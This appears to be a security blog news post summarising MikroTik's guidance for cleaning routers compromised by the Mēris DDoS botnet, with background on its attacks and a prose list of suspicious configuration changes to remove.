MikroTik, the Latvian-based manufacturer of network equipment has shared in yesterday’s blog post some mitigation measures to fight against Mēris botnet. These Mēris Botnet mitigation measures can be used by clients to secure their compromised routers.
Mēris Botnet: a Little Background
As my colleague Dora wrote on the 10th of September, Mēris is a DDoS botnet that has been impacting the Russian company Yandex for a while, reaching its attack peak of 21.8 million requests per second, which was an all-time high in regards to cyberattacks related to the Russian Internet.
DDoS comes from Distributed Denial-of-Service, a topic covered by my colleague Elena in a well-documented article. Simply put, in this kind of attack, the hacker will send lots of requests to a web resource, for example, a company’s website with the intention to surpass the capacity of that network resource to receive requests, as every website has limited space in this sense. This will only eventually lead to improper website functionality.
Before this attack targeted Yandex, Cloudflare also stopped another one in August that reached no less than 17.2 million request-per-second (RPS).
Mēris Botnet Mitigation Measures
In a blog post that was released yesterday, the MikroTik enterprise shared some Mēris botnet mitigation measures intended to remove this botnet from the compromised gateways.
- Clients should make a habit of using passwords that are strong enough in order to stop brute force-attacks.
- As a general ruler, users should make sure that their MikroTik devices are up to date. This way, CVE-2018-14847 Winbox exploits, normally used in its attacks by this botnet will be blocked.
- Remote access should be carefully managed, only by using secured VPN services (for instance, IPsec).
- The trust in local networks should be doubted as a weak password or a lack of passwords would be a clear path for hackers to connect to users’ routers.
- RouterOS configuration should be checked in terms of unknown settings.
Since the malware tries to perform Mikrotik device reconfiguration, the company also recommended the below plan:
Configuration to look out for and remove:
System -> Scheduler rules that execute a Fetch script. Remove these.
IP -> Socks proxy. If you don’t use this feature or don’t know what it does, it must be disabled.
L2TP client named “lvpn” or any L2TP client that you don’t recognize.
Input firewall rule that allows access for port 5678.
In 2018, MikroTik RouterOS was impacted by a vulnerability I mentioned above, CVE-2018-14847. The team of experts said in their blog post that the new wave of 2021 DDoS attacks involving Mēris botnet made use of the same impacted routers from 2018. The issue lies in the fact that if hackers obtained the password in 2018, even if CVE-2018-14847 is patched for a long time, a mere upgrade is not enough.
Unfortunately, closing the vulnerability does not immediately protect these routers. If somebody got your password in 2018, just an upgrade will not help. You must also change the password, re-check your firewall if it does not allow remote access to unknown parties, and look for scripts that you did not create.